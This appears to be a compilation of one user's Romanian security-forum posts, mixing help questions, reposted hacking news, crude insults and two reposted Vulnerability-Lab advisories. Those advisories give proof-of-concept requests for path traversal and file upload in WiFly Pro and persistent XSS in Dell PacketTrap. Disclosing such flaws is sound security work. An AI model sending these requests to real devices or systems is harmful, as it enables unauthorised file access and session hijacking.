Kwelwild

Salut. Am un prieten care si-a reinstalat windows-ul, a instalat mozilla si daca incearca sa intre pe facebook, ii apare pagina ca fiind setata pe 'Fara Stil" dar nu este, tin sa mentionez ca am incercat sa ii schimb si browser-ul si face la fel. A patit cineva? Stie cineva din ce cauza?! Thanks.

La multi (b)ani Andrei!

Thanks. Altcineva? mai stiti?!

Stie cineva un film sau filme gen Rest Stop, vacancy? Adica..gen..care pleaca 'un ala si o aia' la Saint Tropez si dau de belea. Thanks.

http://www.youtube.com/watch?v=SFD0MPCVSBE

Confirm, este de incredere.

Da-mi si mie PM cu forumul.

Updated Opscode, the commercial side of the open source Chef configuration management tool beloved by Google, Facebook, and IBM, has warned customers that a flaw in an unnamed third-party application has left its wiki and ticketing system pwned. "The attacker gained escalated privileges and downloaded the user database for the wiki and ticketing system," the company said in a blog post on Thursday. "The user database that was accessed contained usernames, email addresses, full names, and hashed passwords." "We believe these passwords are adequately secure (the software in question uses the PBKDF2 algorithm), but we will be forcing a password change on the ticketing and wiki systems. If you use this password on other systems, we suggest choosing a new password on those systems as well. We will also contact the affected users via email today." The company was alerted to the attack by internal security monitoring, the attacker has been kicked out, and now a full investigation is underway using forensics the team has gathered. There's no word as to whether the police are involved. Opscode says there's "currently no evidence" that hosted data has been copied or compromised, but it recommends users who use the same username and password for hosted accounts should also change passwords. It's an embarrassing issue for a company that has become something of a cloud and datacenter darling of late, but it could happen to anyone these days and such openness is to be commended. The company promises more details as they become available. ® Update Opscode has provided more details about the hacking attack, and says that all hosted Chef data is now confirmed to be secure and untouched. "The attack happened around 1pm yesterday, and our security systems picked it up in under five minutes," Pauly Comtois, director of operations, told El Reg. "Once we were alerted that someone was running a script in the system, we pulled the plug on the box and took it offline immediately." Overnight, two Opscode teams worked on the problem. The first set about rebuilding the wiki and ticketing system from the ground up so that normal services wouldn't be interrupted, while a second team took the original system and started gathering forensic evidence. It appears the attacker used a vulnerability in the wiki software and ran a JavaScript program from the Uniform Resource Identifier. In the short time before being spotted, the attacker was able to download some database data, but nothing too serious. While the attacker got some information, all passwords are secure from anything but a brute force attack requiring significant processing time, but Comtois said the company wants to let users know about the breach so that they could take precautions – just in case. Sursa: Security breach at Opscode as attackers download databases • The Register

Law-enforcement officials in the U.S. are expanding the use of tools routinely used by computer hackers to gather information on suspects, bringing the criminal wiretap into the cyber age. Federal agencies have largely kept quiet about these capabilities, but court documents and interviews with people involved in the programs provide new details about the hacking tools, including spyware delivered to computers and phones through email or Web links—techniques more commonly associated with attacks by criminals. People familiar with the Federal Bureau of Investigation's programs say that the use of hacking tools under court orders has grown as agents seek to keep up with suspects who use new communications technology, including some types of online chat and encryption tools. The use of such communications, which can't be wiretapped like a phone, is called "going dark" among law enforcement. A spokeswoman for the FBI declined to comment. The FBI develops some hacking tools internally and purchases others from the private sector. With such technology, the bureau can remotely activate the microphones in phones running Google Inc.'s GOOG +1.86% Android software to record conversations, one former U.S. official said. It can do the same to microphones in laptops without the user knowing, the person said. Google declined to comment. The bureau typically uses hacking in cases involving organized crime, child pornography or counterterrorism, a former U.S. official said. It is loath to use these tools when investigating hackers, out of fear the suspect will discover and publicize the technique, the person said. The FBI has been developing hacking tools for more than a decade, but rarely discloses its techniques publicly in legal cases. Earlier this year, a federal warrant application in a Texas identity-theft case sought to use software to extract files and covertly take photos using a computer's camera, according to court documents. The judge denied the application, saying, among other things, that he wanted more information on how data collected from the computer would be minimized to remove information on innocent people. Since at least 2005, the FBI has been using "web bugs" that can gather a computer's Internet address, lists of programs running and other data, according to documents disclosed in 2011. The FBI used that type of tool in 2007 to trace a person who was eventually convicted of emailing bomb threats in Washington state, for example. The FBI "hires people who have hacking skill, and they purchase tools that are capable of doing these things," said a former official in the agency's cyber division. The tools are used when other surveillance methods won't work: "When you do, it's because you don't have any other choice," the official said. Surveillance technologies are coming under increased scrutiny after disclosures about data collection by the National Security Agency. The NSA gathers bulk data on millions of Americans, but former U.S. officials say law-enforcement hacking is targeted at very specific cases and used sparingly. Still, civil-liberties advocates say there should be clear legal guidelines to ensure hacking tools aren't misused. "People should understand that local cops are going to be hacking into surveillance targets," said Christopher Soghoian, principal technologist at the American Civil Liberties Union. "We should have a debate about that." Mr. Soghoian, who is presenting on the topic Friday at the DefCon hacking conference in Las Vegas, said information about the practice is slipping out as a small industry has emerged to sell hacking tools to law enforcement. He has found posts and resumes on social networks in which people discuss their work at private companies helping the FBI with surveillance. A search warrant would be required to get content such as files from a suspect's computer, said Mark Eckenwiler, a senior counsel at Perkins Coie LLP who until December was the Justice Department's primary authority on federal criminal surveillance law. Continuing surveillance would necessitate an even stricter standard, the kind used to grant wiretaps. But if the software gathers only communications-routing "metadata"—like Internet protocol addresses or the "to" and "from" lines in emails—a court order under a lower standard might suffice if the program is delivered remotely, such as through an Internet link, he said. That is because nobody is physically touching the suspect's property, he added. An official at the Justice Department said it determines what legal authority to seek for such surveillance "on a case-by-case basis." But the official added that the department's approach is exemplified by the 2007 Washington bomb-threat case, in which the government sought a warrant even though no agents touched the computer and the spyware gathered only metadata. In 2001, the FBI faced criticism from civil-liberties advocates for declining to disclose how it installed a program to record the keystrokes on the computer of mobster Nicodemo Scarfo Jr. to capture a password he was using to encrypt a document. He was eventually convicted. A group at the FBI called the Remote Operations Unit takes a leading role in the bureau's hacking efforts, according to former officials. Officers often install surveillance tools on computers remotely, using a document or link that loads software when the person clicks or views it. In some cases, the government has secretly gained physical access to suspects' machines and installed malicious software using a thumb drive, a former U.S. official said. The bureau has controls to ensure only "relevant data" are scooped up, the person said. A screening team goes through all of the data pulled from the hack to determine what is relevant, then hands off that material to the case team and stops working on the case. The FBI employs a number of hackers who write custom surveillance software, and also buys software from the private sector, former U.S. officials said. Italian company HackingTeam SRL opened a sales office in Annapolis, Md., more than a year ago to target North and South America. HackingTeam provides software that can extract information from phones and computers and send it back to a monitoring system. The company declined to disclose its clients or say whether any are in the U.S. U.K.-based Gamma International offers computer exploits, which take advantage of holes in software to deliver spying tools, according to people familiar with the company. Gamma has marketed "0 day exploits"—meaning that the software maker doesn't yet know about the security hole—for software including Microsoft Corp.'s Internet Explorer, those people said. Gamma, which has marketed its products in the U.S., didn't respond to requests for comment, nor did Microsoft. Sursa: FBI Taps Hacker Tactics to Spy on Suspects - WSJ.com

Hackers are using the Google Code developer site to spread malware, according to security firm Z-Scaler. Zscaler ThreatLabZ security researcher Chris Mannon, reported uncovering the scheme, warning that it is a marked development on criminals' usual attack strategy. "Malware writers are now turning to commercial file-hosting sites to peddle their wares. If these legitimate file hosts are not scanning the content they are hosting, it may force network administrators to block the service altogether. The kicker is that this time we see that Google Code seems to have swallowed the bad pill," he wrote. He said businesses using the service should adapt their security protocols accordingly to deal with the new threat. "This incident sets a precedent that no file-hosting service is beyond reproach. Blind trust of specific domains should not be tolerated from an organisational or personal perspective. So set those security privileges to kill and keep one eye open for shady files coming from even a seemingly trusted location." The professional-focused site is one of many hit by cyber criminals in recent months. Other websites that have been recently targeted include the Apple Developer and Nasdaq community forums. Both the attacks were designed to steal users' password information rather than alter them to become malware-distribution tools. Security experts have said the attack is part of a growing trend within the hacker community. FireEye regional technical lead Simon Mullis said he expects to see more similar attacks in the very near future. "We see this all of the time. In many cases we see fragments of multi-stage attacks for specific campaigns hosted across a variety of intermediate locations. Any site with user-editable content can be used to host part of the malware attack lifecycle," he said. "The key part here: if you cannot detect the initial inbound exploit, then the rest of the attack can be hidden or obfuscated using this approach. This technique has been used for years (see Aurora in 2009, Pingbed in 2011 and MiniDuke this year) and the traditional security model and simple discrete sandboxing has no answer for it." Sursa: Google Code developer site targeted by hackers - IT News from V3.co.uk

Contul de Twitter al celebrei agentii de stiri Reuters a fost "spart" de hackerii sirieni. Syrian Electronic Army, suspectul numarul unu al atacului, s-ar fi folosit de desene animate pentru a-si arata sustinerea pentru regimul lui Bashar al-Assad. Sapte fotografii au folosit hackerii celebrei Syrian Electronic Army cand au spart contul de Twitter al uneia dintre cele mai cunoscute agentii de stiri din lume: Reuters. Mai mult, fotografiile, niste desene, de fapt, il infatisau pe actualul presedinte al statului sirian, Bashar al-Assad. Agentia este cea mai noua victima a hackerilor sirieni, printre cele care i-au cazut victime aflandu-se conturile ziarului britanic The Guardian, agentiei Associated Press si cel al televiziunii CBS. Ironic, sau nu, sirienii au spart si contul unei publicatii de satira, foarte cunoscuta The Onion. Reteaua de microblogging si-a reafirmat pozitia sustinand ca unul dintre principalele scopuri este cel de a securiza conturile organizatiilor media. Organizatia Syrian Electronic Army a aparut in urma cu doi ani, chiar la inceputul revolutiei anti-Assad. Se crede ca hackerii opereaza din Dubai si sunt controlati de guvernul sirian. Printre actiunile de succes ale organizatiei se numara si "evaporarea" a 130 de miliarde de dolari de pe piata de capital din Statele Unite, actiune reusita prin folosirea contului agentiei Associated Press pentru a anunta ranirea presedintelui Obama intr-o explozie. Sursa: Contul de Twitter al celebrei agentii de stiri Reuters a fost spart de hackerii sirieni. - www.yoda.ro

Conducerea Rusiei a decis sa angajeze bloggeri pentru a combate influenta crescanda a opozitiei in retelele de socializare. Potrivit unei surse apropiate de administratia prezidentiala, autoritatile ruse vor sa controleze, in special, discutiile privind problemele de coruptie sau nationalismul pe Internet. Aceasta nu va insemna ca informatiile vor fi prezentate intr-un mod care ne-ar avantaja, sustin, totusi sursele. Conducerea Rusiei se scuza spunand ca "majoritatea tarilor, inclusiv Statele Unite, practica aceasta politica". Aleksei Navalnii, principalul opozant al presedintelui rus,Vladimir Putin, este un avocat in varsta de 37 de ani, care a devenit cunoscut datorita unor investigatii si dezvaluiri privind coruptia, publicate pe Internet. Internetul este principalul mijloc de exprimare al opozitiei din Rusia, iar retelele sale de socializare au jucat un rol important in valul de contestare, fara precedent, a puterii de la Moscova, care a avut loc pe intregul teritoriu al statului, in iarna 2011-2012. Sursa: Kremlinul angajeaza bloggeri pentru a contracara opozitia pe Internet - www.yoda.ro

Veste proasta pentru toti utilizatorii Facebook. Ce se va intampla in scurt timp cu conturile lor Utilizatorii care au cont pe Facebook primesc o veste proasta. Conducerea retelei de socializare va face o schimbare importanta in acest an. Potrivit Bloomberg, citat de stirileprotv.ro, Facebook va introduce mai multe reclame, iar acestea vor fi publicate automat, direct pe pagina utilizatorilor. Este vorba de spoturi video de 15 secunde. Aceste reclame vor porni singure, in clipa in care utilizatorii vor deschide Facebook. In schimbul acestora, reteaua de socializare va primi intre 1 si 2,5 milioane de dolari pe zi, pentru fiecare reclama, in functie de cati utilizatori vor fi vizati. Desi articolul din Bloomberg sustine zvonurile privind introducerea acestor spoturi, un purtator de cuvant al Facebook a refuzat sa confirme aceasta informatie, scrie Huffington Post. Bloomberg precizeaza ca sursele sale sunt anomine, pentru ca acest proiect nu trebuie inca facut public. Reclamele vor porni automat timp de 15 secunde, ca si in cazul celor de pe YouTube, iar acest lucru se va intampla de 3 ori pe zi, scrie Bloomberg. Sursa: Veste proasta pentru toti utilizatorii Facebook. Ce se va intampla in scurt timp cu conturile lor - www.yoda.ro

Description: The POC DDoSer Addon for Firefox Fore more details: http://keralacyberforce.in/abusing-exploiting-and-pwning-with-firefox-add-ons/ @ajinabraham Sursa: Xenotix Ddoser Addon For Firefox

Stirea pulii. //LE: Nexas, pleaca in pula mea pe isloboz.

Acum 3 luni am raportat si eu unul si prima data mi-au spus sa le dau mai multe detalii, le-am detaliat, apoi mi-au spus ca il vor repara si cica voi fi adaugat in HoF, dar nici acum nu am mai primit raspuns de la ei. Credeam ca au uitat dar daca zici ca acum 6 luni ai raportat, probabil o sa primesc si eu un raspuns. ON: Felicitari, sa tot mai fie la bug bounty!

Atentie cu share-ul! Doi aradeni s-au trezit cu politistii in casa Politistii aradeni stau la panda pentru a descoperi persoane care pun la share filme, muzica, jocuri sau softuri. Programele de “file sharing” sunt foarte populare de ani de zile, prin intermediul acestora fiind descarcate fisiere in mod gratuit. Numai ca acest lucru este ilegal, iar cei care sunt prinsi risca sa fie cercetati penal. Doi aradeni s-au trezit in casa, cu ofiteri ai Serviciului de Investigare Fraude, potrivit stirileprotv.ro. Camelia Tuduce, purtator de cuvant Politia Arad: “Ofiterii au efectuat doua perchezitii domiciliare la doua persoane suspectate ca, prin intermediul unor programe de tip, descarcau si puneau la dispozitia altor persoane filme, muzica sau jocuri protejate de legea dreptului de autor”. Politistii nu au plecat cu mana goala din casele celor doi. Au ridicat trei hard-diskuri si doua laptop-uri continand filme, muzica, jocuri si programe “reproduse in mod neautorizat”. Au mai confiscat 121 de CD-uri care nu prezentau holograma de securitate, fiind susceptibile a fi marfa pirat. Cei doi aradeni sunt cercetati in libertate pentru „punerea la dispozitia publicului prin internet, fara consimtamantul titularului, a operelor si produselor purtatoare de drepturi de autor si conexe”. Sursa: Atentie cu share-ul! Doi aradeni s-au trezit cu politistii in casa - www.yoda.ro

Iar eu sa te muiesc pe tine si pe restul membrilor din ghena voastra de sobolani!

Google isi cere scuze pentru stergerea Insulei Jura din hartile sale Asezarea, localizata in vestul coastei Scotiei lipseste cu desavarsire desi dimensiunile ei sunt apreciabile. La vest de Peninsula Kintyre, din nordul Regatului Unit al Marii Britanii, se afla o insula care... lipseste de pe hartile Google! Mai ciudat este faptul ca asezarea apare pe Google Earth si in versiunea Satellite View a Google Maps, dar la trecerea pe Maps View, dispare. Jura are mai mult de 250 de kilometri patrati, doar 200 de locuitori si este cunoscuta pentru whisky-ul pe care il produce dar si pentru numeroasa "populatie" de cerbi (acestia sunt de 25 de ori mai multi decat oameni). "Legatura" dintre mica insula si cea mai mare insula a Regatului Britanic se face cu ajutorul unui mic ferryboat sau cu "taxiuri" nautice. Google nu se afla la prima gafa de acest fel. In 2011, portul german Emden era afisat ca fiind sub suverinitate olandeza, iar anul trecut, Sunrise, un oras din Florida, disparuse complet din harti. Sursa: Google isi cere scuze pentru stergerea Insulei Jura din hartile sale - www.yoda.ro

WiFly 1.0 Pro iOS - Multiple Vulnerabilities Title: ====== WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities Date: ===== 2013-07-15 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1011 VL-ID: ===== 1011 Common Vulnerability Scoring System: ==================================== 6.3 Introduction: ============= It is the best solution for transferring photos, songs, documents, movies and other files between computer and your mobile devices over wireless network. Simply launch application on your iOS device and scan QR code from http://wifly.me to connect your phone. Drop your files into opened page and vice versa! No cloud or internet access required - no data leaves your local network. Both your devices must have access to the same LAN or WLAN - no additional network configurations needed. Transferred documents can be opened with any supported App on your iOS device. Capabilities:? - Multiple uploads? - Easily Drag & Drop multiple files to WiFly? - Preview pictures in the browser - Downloading the entire folder to your computer? - Browsing files and folders directly on mobile device? - Exchange files between mobile devices - Built in preview of images, documents, music and video files (Copy of the Homepage: https://itunes.apple.com/us/app/wifly-pro/id641092695 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone). Report-Timeline: ================ 2013-07-15: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Apple AppStore Product: WiFly Pro 1.0 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A local file include and arbitrary file upload web vulnerability is detected in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone). The vulnerabilities are located in the file upload module of the web-server (http://localhost:4885/) when processing to request via POST a manipulated filename. The injected file will be accessable via the index listing module of the application. Remote attackers can exchange the filename with a double or tripple extension via POST method to bypass the upload validation and filter process. After the upload the attacker access the file with one extension and exchange it with the other one to execute for example php, js, html codes. The filter in the application itself disallow to rename a file with special chars because of a input field restriction. Attackers need to request 2 different urls. First the file as url with a parameter of the filename inside to display and as secound step the file will be uploaded with the manipulated filename in the POST request. Exploitation of the vulnerability requires no user interaction but the victim iOS device needs to accept the other device connection. Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload. Vulnerable Application(s): [+] WiFly Pro 1.0 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Upload Vulnerable File(s): [+] upload.json & add Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index Listing (http://localhost:4885/) Proof of Concept: ================= The local file/path include and arbitrary file upload vulnerability can be exploited by remote attackers without user interaction but the connection needs to be accepted by the target system. For demonstration or reproduce ... Standard Request: Content-Disposition: form-data; name="files[]"; filename="s2.png"\r\nContent-Type: image/png\r\n\r\n?PNG\r\n\n Status: 200 POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=new-image23.png&sessionid=1373658611109 Load Flags[LOAD_BYPASS_CACHE ] Content Size[118] Mime Type[application/x-unknown-content-type] PoC: 1.1 - File/Path Include Vulnerability POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025& last_modified=1331091664536000&name=../../[File/Path Include Vulnerability!].png&sessionid=1373658611109 POST_DATA[-----------------------------27213192708057 Content-Disposition: form-data; name="files[]"; filename="../../[File/Path Include Vulnerability!]" Content-Type: image/png PoC: 1.2 - Arbitrary File Upload Vulnerability POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025& last_modified=1331091664536000&name=[Arbitrary File Upload Vulnerability!].png.gif.html.php.js&sessionid=1373658611109 POST_DATA[-----------------------------27213192708057 Content-Disposition: form-data; name="files[]"; filename="[Arbitrary File Upload Vulnerability!].png.gif.html.php.js" Content-Type: image/png Solution: ========= The vulnerability can be patched by a restriction of the json upload request and url parameter. The POST request when processing to upload needs to be restricted, encoded and filtered. Risk: ===== The security risk of the local file/path include & arbitrary file upload vulnerability is estimated as high. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com Sursa: WiFly 1.0 Pro iOS - Multiple Vulnerabilities

Dell PacketTrap MSP RMM 6.6.x - Multiple XSS Vulnerabilities Title: ====== Dell PacketTrap MSP RMM 6.6.x - Multiple Persistent Web Vulnerabilities Date: ===== 2013-07-17 References: =========== http://www.vulnerability-lab.com/get_content.php?id=791 VL-ID: ===== 791 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ============= Network Monitoring Software & Remote monitoring and management. Be the first to know. Remote network monitoring and management for the entire IT infrastructure. See all your customers network traffic, application performance, and device events, in one central view. Fast and easy anytime, anywhere access to any device. No more truck roll outs to site to fix problems. packetTrap RMM allows you to save time, improve productivity, and increase ROI. To meet the needs of your customers, packetTrap RMM offers agent and agentless based deployment architecture for ultimate flexibility. Network traffic & website surfing analysis - Deep AntiVirus Integration Virtual Infrastructure Monitoring - VoIP Monitoring - Elaborate Scripting Engine - Network Mapping - Support for Most PSA - Custom Reports & Dashboard Gadgets - Performance Baseline Monitoring - packetTrap RMM Community - MSP Acceleration Program. (Copy of the Vendor Homepage: http://www.packettrap.com/products/packettrap-msp/ ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the DELL PacketTrap 6.6.23938 MSP RMM Software. Report-Timeline: ================ 2013-01-24: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2013-02-06: Vendor Notification 2013-02-08: Vendor Response/Feedback 2013-**-**: Vendor Fix/Patch 2013-07-17: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== DELL Product: PacketTrap MSP RMM 6.6.23938 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== Multiple persistent input validation vulnerabilities are detected in the DELL PacketTrap MSP v6.6.23938 appliance application. The bug allows remote attackers to implement/inject own malicious script code on the application side of the software (persistent). The first persistent vulnerability is located in the add function of the reports (reports manager & scheduled reports|add) module when processing to request the vulnerable gadget_name, gadget_description, template name and device name parameters. The vulnerability allows to inject persistent script code as report when processing to add a report or device. The result is the persistent execution of script code out of the add reports preview software listing. Exploitation requires low user interaction & a low privileged appliance web application user account. The secound persistent vulnerability is located in the reports (index listing) module when processing to request the vulnerable customer name, device name & host name parameter & listing. The vulnerability allows to inject via add function persistent script code. The result is the persistent execution of script code out of the index reports software listing. Exploitation of the vulnerability requires low user interaction & a low privilege web application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin), persistent phishing, persistent external redirects to malware or scam and (stable) persistent web context manipulation of the affected vulnerable module. Vulnerable Section(s): [+] Reports Vulnerable Module(s): [+] Report Manager [+] Scheduled Reports Vulnerable Parameter(s): [+] Template Name [+] Device Name [+] gadget_name [+] gadget_description [+] Customername [+] HostName Affected Section(s): [+] Add Preview Listing [+] Software Report Listing Proof of Concept: ================= The persistent script code inject vulnerabilities can be exploited by low privileged group user accounts with low required user interaction. For demonstration or reproduce ... Review: Reports > Report Manager > [Add Preview Listing & Software Report Listing] </style></head><body><table style="width:100%"><tr><td><img src="5665fcbb3b1c4dd1bf902fe2a199ea15.png" alt="Quest" title="Quest" /></td></tr> <tr><td><h2>"><[PERSISTENT INJECTED SCRIPT CODE!]) <</h2> <p>All devices for customer '<[PERSISTENT INJECTED SCRIPT CODE!]"><[PERSISTENT INJECTED SCRIPT CODE!]'<BR>Generated: 10.12.2012 21:20</p></td> </tr><tr><td><table class="dash_frame" cellspacing="0" cellpadding="0" style="border-collapse:collapse;"><tr> <td><table class="dash_col_frame" cellspacing="0" cellpadding="0" style="border-collapse:collapse;"><tr> <td><table class="gadget_frame" cellspacing="0" cellpadding="0" style="border-collapse:collapse;"><tr> <td><table class="gadget_header" cellspacing="0" cellpadding="0" style="border-collapse:collapse;"><tr> <td><span class="gadget_name">"><[PERSISTENT INJECTED SCRIPT CODE!]) <</span><span class="gadget_description"> <br>Top 10 devices for customer '<[PERSISTENT INJECTED SCRIPT CODE!]"><[PERSISTENT INJECTED SCRIPT CODE!]'</span></td> </tr></table></td></tr><tr> <td><table class="list_gadget_body sortable" cellspacing="0" cellpadding="2" style="border-collapse:collapse;"> <tr class="gadget_header_row"> <th class="gadget_header_cell_horiz" align="left" valign="middle"><span>Host Name</span></th><th class="gadget_header_cell_horiz" align="left" valign="middle"><span>IP Address</span></th><th class="gadget_header_cell_horiz" align="left" valign="middle"> <span title="Customer Name">Customer Name</span></th><th class="gadget_header_cell_horiz" align="right" valign="middle"><span> Ping Response Time</span></th><th class="gadget_header_cell_horiz" align="right" valign="middle"><span>Disk Free % Avg</span></th> <th class="gadget_header_cell_horiz" align="right" valign="middle"><span title="Average cpu usage of a system.">CPU % Avg</span></th> <th class="gadget_header_cell_horiz" align="right" valign="middle"><span>Physical Memory Used %</span></th><th align="right" valign="middle"> <span>Interface Traffic Total Avg</span></th></tr><tr> <td align="left" valign="middle"><span title="HOSTBUSTER [192.168.0.103]" style="color:Black;font-weight:normal;font-style:normal; text-decoration:none;">HOSTBUSTER</span></td><td align="left" valign="middle"><span title="HOSTBUSTER" style="color:Black;font-weight:normal; font-style:normal;text-decoration:none;">192.168.0.103</span></td><td align="left" valign="middle"><span style="color:Black;font-weight:normal; font-style:normal;text-decoration:none;"><[PERSISTENT INJECTED SCRIPT CODE!]"><[PERSISTENT INJECTED SCRIPT CODE!]</span></td><td align="right" valign="middle"><span class="numeric_value_0" style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">0 ms</span></td> <td align="right" valign="middle"><span style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">62%</span></td> <td align="right" valign="middle"><table cellpadding="0" cellspacing="0"><tr> <td><span class="numeric_value_0" style="color:Black;font-weight: normal;font-style:normal;text-decoration:none;">58.50%</span><span> </span></td><td><table cellspacing="0" cellpadding="1" style="font-size:0.75em;height:10px;width:70px;border-collapse:collapse;margin:0;padding:0;"> <tr><td class="numeric_bar_0" style="width:58%;"> </td><td class="numeric_bar_padding" style="width:42%;"> </td> </tr></table></td></tr> </table></td><td align="right" valign="middle"><table cellpadding="0" cellspacing="0"><tr> <td><span class="numeric_value_0" style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">59.80%</span><span> </span></td> <td><table cellspacing="0" cellpadding="1" style="font-size:0.75em;height:10px;width:70px;border-collapse:collapse;margin:0;padding:0;"> <tr><td class="numeric_bar_0" style="width:60%;"> </td><td class="numeric_bar_padding" style="width:40%;"> </td></tr></table></td></tr> </table></td><td align="right" valign="middle"><span style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;"> 0.15 Mbps</span></td></tr><tr> <td align="left" valign="middle"><span title="<[PERSISTENT INJECTED SCRIPT CODE!]20"><[PERSISTENT INJECTED SCRIPT CODE!] < [127.0.0.9]" style="color:Black;font-weight:normal;font-style: normal;text-decoration:none;"><[PERSISTENT INJECTED SCRIPT CODE!]%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <</span></td><td align="left" valign="middle"><span title="<[PERSISTENT INJECTED SCRIPT CODE!] <" style="color:Black; font-weight:normal;font-style:normal;text-decoration:none;">127.0.0.9</span></td><td align="left" valign="middle"><span style="color:Black; font-weight:normal;font-style:normal;text-decoration:none;"><[PERSISTENT INJECTED SCRIPT CODE!]</span></td><td align="right" valign="middle"><span class="numeric_value_0" style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">0 ms</span></td> <td align="right" valign="middle"><span style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">62%</span></td> <td align="right" valign="middle"><table cellpadding="0" cellspacing="0"> <tr><td><span class="numeric_value_0" style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">22.00%</span><span> </span></td> <td><table cellspacing="0" cellpadding="1" style="font-size:0.75em;height:10px;width:70px;border-collapse:collapse;margin:0;padding:0;"> <tr><td class="numeric_bar_0" style="width:22%;"> </td><td class="numeric_bar_padding" style="width:78%;"> </td> </tr></table></td></tr></table></td><td align="right" valign="middle"><table cellpadding="0" cellspacing="0"> <tr><td><span class="numeric_value_0" style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">60.41%</span><span> </span></td><td><table cellspacing="0" cellpadding="1" style="font-size:0.75em;height:10px;width:70px;border-collapse:collapse;margin:0;padding:0;"> <tr><td class="numeric_bar_0" style="width:60%;"> </td><td class="numeric_bar_padding" style="width:40%;"> </td> </tr></table></td></tr> </table></td><td align="right" valign="middle"><span style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">0.16 Mbps</span></td> </tr></table></td></tr></table></td></tr></table></td></tr></table></td></tr></table></body></html> Manually reproduce steps ... 1. Install the PacketTrap MSP RMM Software 6.x and start it up 2. Create an first account and switch to the main menu of the software dashboard 3. Go to the reports section and click on add reports 4. Inject your own script code via add in the vulnerable parameters 5. Click the next step button (down) of the add mask 6. The preview executes the code in the right listing after processing the first step. #reproduce1 7. Now, we reproduce the secound issue. Save the report with the persistent injected own script code 8. Switch (after the save) to the index module of the reports or scheduled reports listing 9. The code will be executed persistent out of the main software reports module when processing to watch the customer name, device name or host name #reproduce2 Risk: ===== The security risk of the persistent input validation vulnerabilities are estimated as medium(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright ? 2013 | Vulnerability Laboratory 